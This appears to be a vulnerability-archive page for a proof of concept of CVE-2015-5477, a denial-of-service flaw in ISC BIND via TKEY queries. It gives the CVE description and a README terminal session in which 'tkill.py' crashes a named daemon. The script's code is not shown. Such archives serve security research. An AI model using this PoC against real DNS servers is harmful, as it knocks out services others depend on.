Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2015-5477 PoC — ISC BIND 拒绝服务漏洞

Source
Associated Vulnerability
Title:ISC BIND 拒绝服务漏洞 (CVE-2015-5477)
Description:named in ISC BIND 9.x before 9.9.7-P2 and 9.10.x before 9.10.2-P3 allows remote attackers to cause a denial of service (REQUIRE assertion failure and daemon exit) via TKEY queries.
Description
PoC for BIND9 TKEY assert DoS (CVE-2015-5477)
Readme
# cve-2015-5477
PoC for BIND9 TKEY assert DoS (CVE-2015-5477)

```
$ ps awux | grep -v grep | grep bind
bind      2373  0.0  2.2 141164 13424 ?        Ssl  14:58   0:00 /var/named/chroot/sbin/named -u bind -t /var/named/chroot -c /etc/named.conf
$ python tkill.py 127.0.0.1
Begin emission:
..Finished to send 1 packets.
.......................................................................................................................................................................................................................^C
Received 217 packets, got 0 answers, remaining 1 packets
$ ps awux | grep -v grep | grep bind
$
```
File Snapshot

[4.0K] /data/pocs/0bd700bd9c21f0e5367d85af70df9c0e27a58270 ├── [ 638] README.md └── [ 300] tkill.py 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →